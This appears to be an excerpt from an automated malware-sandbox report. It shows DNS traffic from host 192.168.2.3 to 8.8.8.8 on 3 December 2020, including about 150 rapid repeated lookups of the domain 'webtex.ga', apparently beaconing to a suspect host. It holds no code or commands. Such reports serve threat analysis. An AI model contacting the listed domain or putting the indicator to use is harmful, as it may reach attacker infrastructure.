                                    Dec 3, 2020 10:04:13.482465029 CET53598808.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:13.773528099 CET5500053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:13.800709963 CET53550008.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:14.070842981 CET5034153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:14.097882986 CET53503418.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:14.356909990 CET6036953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:14.383955002 CET53603698.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:14.643935919 CET5267753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:14.670947075 CET53526778.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:14.910386086 CET4934753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:14.937441111 CET53493478.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:15.187752008 CET6360453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:15.214709044 CET53636048.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:15.465322018 CET5016553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:15.492562056 CET53501658.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:15.742861986 CET6172853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:15.769968987 CET53617288.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:16.022732019 CET6169053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:16.049843073 CET53616908.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:16.517864943 CET5219253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:16.544792891 CET53521928.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:16.820955038 CET5809053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:16.847960949 CET53580908.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:17.112066031 CET5031153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:17.139122009 CET53503118.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:17.833745956 CET5348453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:17.860759974 CET53534848.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:18.132854939 CET6522553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:18.159993887 CET53652258.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:19.915863037 CET5030853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:19.942914009 CET53503088.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:20.226304054 CET5828153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:20.253314972 CET53582818.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:20.501063108 CET5944853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:20.528146982 CET53594488.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:20.803499937 CET5509753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:20.830697060 CET53550978.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:21.247961044 CET5760753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:21.274955034 CET53576078.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:21.527256012 CET4973453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:21.554297924 CET53497348.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:21.853420019 CET6325453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:21.880640030 CET53632548.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:22.121886015 CET5961053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:22.148855925 CET53596108.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:22.394130945 CET5850553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:22.421103954 CET53585058.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:22.719099998 CET5824253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:22.746226072 CET53582428.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:22.981034994 CET5234153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:23.007875919 CET53523418.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:23.254004002 CET6187653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:23.281064034 CET53618768.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:23.541433096 CET6345553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:23.568725109 CET53634558.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:23.816549063 CET6461053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:23.843622923 CET53646108.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:24.106113911 CET5157053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:24.133373022 CET53515708.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:24.394944906 CET6056253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:24.422159910 CET53605628.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:24.686381102 CET6392753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:24.713453054 CET53639278.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:25.305768967 CET5235253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:25.332806110 CET53523528.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:25.729907990 CET6409253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:25.756966114 CET53640928.8.8.8192.168.2.3

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Dec 3, 2020 10:02:28.585885048 CET192.168.2.38.8.8.80x9dc0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:29.235055923 CET192.168.2.38.8.8.80xcbccStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:29.554157019 CET192.168.2.38.8.8.80xc90eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:30.093907118 CET192.168.2.38.8.8.80xf2d3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:30.440342903 CET192.168.2.38.8.8.80x8338Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:31.059484959 CET192.168.2.38.8.8.80x6d5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:31.465171099 CET192.168.2.38.8.8.80x9e60Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:31.770330906 CET192.168.2.38.8.8.80xd5d3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:32.094156981 CET192.168.2.38.8.8.80x74e9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:32.416392088 CET192.168.2.38.8.8.80x6a4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:32.708549976 CET192.168.2.38.8.8.80xd74Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:33.007380962 CET192.168.2.38.8.8.80x5d50Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:33.324595928 CET192.168.2.38.8.8.80x1da8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:33.646433115 CET192.168.2.38.8.8.80x8589Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:34.000180006 CET192.168.2.38.8.8.80x7eabStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:34.313985109 CET192.168.2.38.8.8.80xf473Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:34.770662069 CET192.168.2.38.8.8.80x35eeStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:35.186542034 CET192.168.2.38.8.8.80xce9dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:35.972059011 CET192.168.2.38.8.8.80x6755Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:36.264887094 CET192.168.2.38.8.8.80x9615Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:36.717093945 CET192.168.2.38.8.8.80xa2f9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:38.498115063 CET192.168.2.38.8.8.80x88f3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:38.826427937 CET192.168.2.38.8.8.80x42fbStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:39.146038055 CET192.168.2.38.8.8.80xb789Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:39.479924917 CET192.168.2.38.8.8.80x5b0fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:39.794024944 CET192.168.2.38.8.8.80xc726Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:40.109395027 CET192.168.2.38.8.8.80xd319Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:40.415194988 CET192.168.2.38.8.8.80xc211Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:40.703869104 CET192.168.2.38.8.8.80xdd07Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.027050972 CET192.168.2.38.8.8.80x8454Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.361510038 CET192.168.2.38.8.8.80x1398Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.670005083 CET192.168.2.38.8.8.80x70e5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.976327896 CET192.168.2.38.8.8.80x7f1fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.270056009 CET192.168.2.38.8.8.80x3748Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.604676962 CET192.168.2.38.8.8.80x1726Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.928745985 CET192.168.2.38.8.8.80x602dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:43.225001097 CET192.168.2.38.8.8.80x24ebStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:43.561017036 CET192.168.2.38.8.8.80x238dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:43.881627083 CET192.168.2.38.8.8.80x9a51Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:44.201263905 CET192.168.2.38.8.8.80xe7c4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:44.502989054 CET192.168.2.38.8.8.80x65e4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:44.972174883 CET192.168.2.38.8.8.80x70f3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:45.313241005 CET192.168.2.38.8.8.80xbe0dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:45.632884026 CET192.168.2.38.8.8.80x4443Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:45.958441973 CET192.168.2.38.8.8.80x44adStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:46.264465094 CET192.168.2.38.8.8.80x21bdStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:46.572137117 CET192.168.2.38.8.8.80x55ddStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:46.884318113 CET192.168.2.38.8.8.80x5c7cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:47.159286976 CET192.168.2.38.8.8.80x2b96Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:47.451164007 CET192.168.2.38.8.8.80xf13cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:47.757059097 CET192.168.2.38.8.8.80xca9dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.072316885 CET192.168.2.38.8.8.80xa946Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.382123947 CET192.168.2.38.8.8.80xbab1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.664874077 CET192.168.2.38.8.8.80xe678Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.953640938 CET192.168.2.38.8.8.80xe05fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:49.240653038 CET192.168.2.38.8.8.80x7be3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:49.537837982 CET192.168.2.38.8.8.80x5ed8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.012649059 CET192.168.2.38.8.8.80xa25Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.312208891 CET192.168.2.38.8.8.80x3f42Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.616952896 CET192.168.2.38.8.8.80x58ceStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.912763119 CET192.168.2.38.8.8.80x2a57Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:51.202581882 CET192.168.2.38.8.8.80x9ccaStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:51.474638939 CET192.168.2.38.8.8.80x2077Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:51.791898012 CET192.168.2.38.8.8.80x99f5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:52.069417953 CET192.168.2.38.8.8.80x8296Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:52.393465042 CET192.168.2.38.8.8.80x8f91Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:52.717830896 CET192.168.2.38.8.8.80x3392Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:53.049109936 CET192.168.2.38.8.8.80xa6edStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:53.412718058 CET192.168.2.38.8.8.80x4d4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:53.700769901 CET192.168.2.38.8.8.80xb873Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:54.064919949 CET192.168.2.38.8.8.80xa277Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:54.348299980 CET192.168.2.38.8.8.80xd645Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:54.633327961 CET192.168.2.38.8.8.80x1694Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:55.265343904 CET192.168.2.38.8.8.80x7c88Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:55.642606020 CET192.168.2.38.8.8.80xa1c1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:57.107584953 CET192.168.2.38.8.8.80x8e9cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:57.453136921 CET192.168.2.38.8.8.80xfea6Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:57.861424923 CET192.168.2.38.8.8.80x3f28Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:58.165703058 CET192.168.2.38.8.8.80x1e87Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:58.471180916 CET192.168.2.38.8.8.80x7da4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:58.767008066 CET192.168.2.38.8.8.80x26b0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.063576937 CET192.168.2.38.8.8.80x41a9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.332727909 CET192.168.2.38.8.8.80x1b27Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.620688915 CET192.168.2.38.8.8.80x9482Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.915173054 CET192.168.2.38.8.8.80x4379Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:00.208374977 CET192.168.2.38.8.8.80x59c6Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:00.489223003 CET192.168.2.38.8.8.80x15e8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:01.522310972 CET192.168.2.38.8.8.80x15e8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:01.962356091 CET192.168.2.38.8.8.80x2857Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:02.265445948 CET192.168.2.38.8.8.80x34c8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:02.565130949 CET192.168.2.38.8.8.80xae95Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:02.839083910 CET192.168.2.38.8.8.80xcd57Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:03.107460022 CET192.168.2.38.8.8.80xc3ffStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:03.453428984 CET192.168.2.38.8.8.80x54f1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:03.796557903 CET192.168.2.38.8.8.80xb71bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:04.060163975 CET192.168.2.38.8.8.80x6edfStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:04.340807915 CET192.168.2.38.8.8.80x832aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:04.846359015 CET192.168.2.38.8.8.80xd28eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:05.140671015 CET192.168.2.38.8.8.80x355Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:05.526319027 CET192.168.2.38.8.8.80x2882Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:05.999557018 CET192.168.2.38.8.8.80x43dfStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:06.272005081 CET192.168.2.38.8.8.80x803eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:06.923021078 CET192.168.2.38.8.8.80x95f7Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:07.196409941 CET192.168.2.38.8.8.80xba9fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:07.464982033 CET192.168.2.38.8.8.80xc3ecStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:07.766259909 CET192.168.2.38.8.8.80x5723Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.061608076 CET192.168.2.38.8.8.80x28aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.342209101 CET192.168.2.38.8.8.80x8aefStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.640106916 CET192.168.2.38.8.8.80x4a5cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.922322035 CET192.168.2.38.8.8.80xeebaStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:09.202274084 CET192.168.2.38.8.8.80x52ffStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:09.503087044 CET192.168.2.38.8.8.80x64a0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:09.788084984 CET192.168.2.38.8.8.80xbdd8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:10.242281914 CET192.168.2.38.8.8.80x220bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:10.629410982 CET192.168.2.38.8.8.80xb11bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:11.015091896 CET192.168.2.38.8.8.80x8a65Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:11.502537012 CET192.168.2.38.8.8.80x3590Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:11.768229008 CET192.168.2.38.8.8.80x82c7Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:12.141284943 CET192.168.2.38.8.8.80x460bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:12.443948030 CET192.168.2.38.8.8.80x7c2aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:12.813215971 CET192.168.2.38.8.8.80xf60bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:13.089744091 CET192.168.2.38.8.8.80x220eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:13.933495998 CET192.168.2.38.8.8.80xd70eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:15.775830030 CET192.168.2.38.8.8.80x51d9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:16.220994949 CET192.168.2.38.8.8.80xf658Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:16.659768105 CET192.168.2.38.8.8.80xe36dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:17.074780941 CET192.168.2.38.8.8.80xf6aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:17.538553953 CET192.168.2.38.8.8.80xb93Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:18.230065107 CET192.168.2.38.8.8.80x663fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:18.976856947 CET192.168.2.38.8.8.80x4f9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:19.320147991 CET192.168.2.38.8.8.80x6067Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:19.815073967 CET192.168.2.38.8.8.80xc41fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:20.114562035 CET192.168.2.38.8.8.80x67b4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:20.585319996 CET192.168.2.38.8.8.80xc411Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:20.865005970 CET192.168.2.38.8.8.80x135fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:21.350702047 CET192.168.2.38.8.8.80x7c7aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:21.938216925 CET192.168.2.38.8.8.80x7a9bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:22.212102890 CET192.168.2.38.8.8.80x2061Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:22.710444927 CET192.168.2.38.8.8.80x9a2dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:22.973746061 CET192.168.2.38.8.8.80x5736Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:23.470324039 CET192.168.2.38.8.8.80x2777Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:23.971995115 CET192.168.2.38.8.8.80x10d0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:24.629245996 CET192.168.2.38.8.8.80xb2fcStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:25.133505106 CET192.168.2.38.8.8.80xf47fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:25.611252069 CET192.168.2.38.8.8.80xc2deStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:26.139666080 CET192.168.2.38.8.8.80x2c89Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:26.750502110 CET192.168.2.38.8.8.80xec75Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:27.020617962 CET192.168.2.38.8.8.80x37feStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:27.542334080 CET192.168.2.38.8.8.80xee9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:28.052023888 CET192.168.2.38.8.8.80x268cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:28.320911884 CET192.168.2.38.8.8.80xa636Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:28.947045088 CET192.168.2.38.8.8.80xb2a4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:29.212243080 CET192.168.2.38.8.8.80xcf41Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:29.856785059 CET192.168.2.38.8.8.80x19d2Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:30.428265095 CET192.168.2.38.8.8.80x4f6bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:30.940175056 CET192.168.2.38.8.8.80xe5a7Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:31.211011887 CET192.168.2.38.8.8.80x22c0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:31.701210022 CET192.168.2.38.8.8.80x1998Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:31.965411901 CET192.168.2.38.8.8.80xbd1bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:32.553005934 CET192.168.2.38.8.8.80x5335Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:32.813930035 CET192.168.2.38.8.8.80x235eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:33.387254000 CET192.168.2.38.8.8.80xccc0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:33.887957096 CET192.168.2.38.8.8.80xc68eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:34.397080898 CET192.168.2.38.8.8.80xdef7Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:34.893606901 CET192.168.2.38.8.8.80xfaf1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:35.446471930 CET192.168.2.38.8.8.80xa930Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:35.982255936 CET192.168.2.38.8.8.80xea6eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:36.558135033 CET192.168.2.38.8.8.80x7bf5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:37.046510935 CET192.168.2.38.8.8.80xeb1bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:37.585237980 CET192.168.2.38.8.8.80x58c7Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:38.089342117 CET192.168.2.38.8.8.80x8c94Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:38.558370113 CET192.168.2.38.8.8.80xf10dStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:39.105139017 CET192.168.2.38.8.8.80x640dStandard query (0)webtex.gaA (IP address)IN (0x0001)
